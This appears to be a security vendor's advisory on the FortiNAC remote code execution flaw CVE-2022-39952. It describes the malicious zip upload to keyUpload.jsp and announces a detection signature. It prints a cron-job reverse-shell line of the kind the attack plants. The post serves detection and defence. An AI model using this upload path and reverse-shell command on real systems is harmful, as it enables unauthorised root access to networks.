top of page

Fortinet FortiNAC Remote Code Execution (CVE-2022-39952)

Application Details

FortiNAC is a zero-trust access solution that oversees and protects all digital assets connected to the enterprise network, covering devices from IT, IoT, OT/ICS to IoMT. FortiNAC is Fortinet’s network access control solution that enhances the Fortinet Security Fabric with visibility, control, and automated response for everything that connects to the network. FortiNAC provides protection against IoT threats, extends control to third-party devices, and orchestrates automatic response to a wide range of networking events.​


Fortinet FortiNAC could allow a remote attacker upload a malicious zip file. The vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.


A zip file is created that contains a file where it is to be extracted. This payload is used to write a cron job which then initiates a reverse shell back to the attacker.

POST /configWizard/keyUpload.jsp

* * * * * root bash -i >& /dev/tcp/ 0 >&1


By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.


Idappcom have created signature 8023583 along with a traffic file for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here:


bottom of page